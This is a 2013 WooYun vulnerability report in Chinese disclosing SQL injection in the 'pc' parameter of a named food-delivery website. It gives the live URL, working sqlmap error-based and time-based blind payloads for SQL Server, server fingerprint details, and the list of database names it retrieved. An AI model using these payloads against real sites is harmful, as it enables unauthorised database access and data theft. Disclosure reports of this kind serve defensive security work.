漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-045075
漏洞标题:绿淘外卖网主站sql注入漏洞
相关厂商:绿淘网
漏洞作者: zmbs
提交时间:2013-12-06 11:10
修复时间:2014-01-20 11:11
公开时间:2014-01-20 11:11
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
很常见的sql注入漏洞
详细说明:
http://gtao.me/waimai/Default.aspx?pc=wdk&city=beijing
pc参数可以注入
经常订餐的网站,多少注意点安全嘛
漏洞证明:
GET parameter 'pc' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 55 HTTP(s) requests:
---
Place: GET
Parameter: pc
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pc=wdk%' AND 6376=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(119)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6376=6376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(121)+CHAR(117)+CHAR(113))) AND '%'='&city=beijing
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pc=wdk%' AND 4874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&city=beijing
---
[00:15:04] [INFO] testing Microsoft SQL Server
[00:15:04] [INFO] confirming Microsoft SQL Server
[00:15:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[00:15:05] [INFO] fetching database names
[00:15:06] [INFO] the SQL query used returns 10 entries
[00:15:06] [INFO] retrieved: db_piclib
[00:15:06] [INFO] retrieved: dnn
[00:15:07] [INFO] retrieved: gtaocenter
[00:15:07] [INFO] retrieved: master
[00:15:07] [INFO] retrieved: model
[00:15:07] [INFO] retrieved: msdb
[00:15:08] [INFO] retrieved: ReportServer
[00:15:08] [INFO] retrieved: ReportServerTempDB
[00:15:08] [INFO] retrieved: tempdb
[00:15:09] [INFO] retrieved: test
available databases [10]:
[*] db_piclib
[*] dnn
[*] gtaocenter
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
修复方案:
修复代码,或者干脆找个免费的cdn吧
版权声明:转载请注明来源 zmbs@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝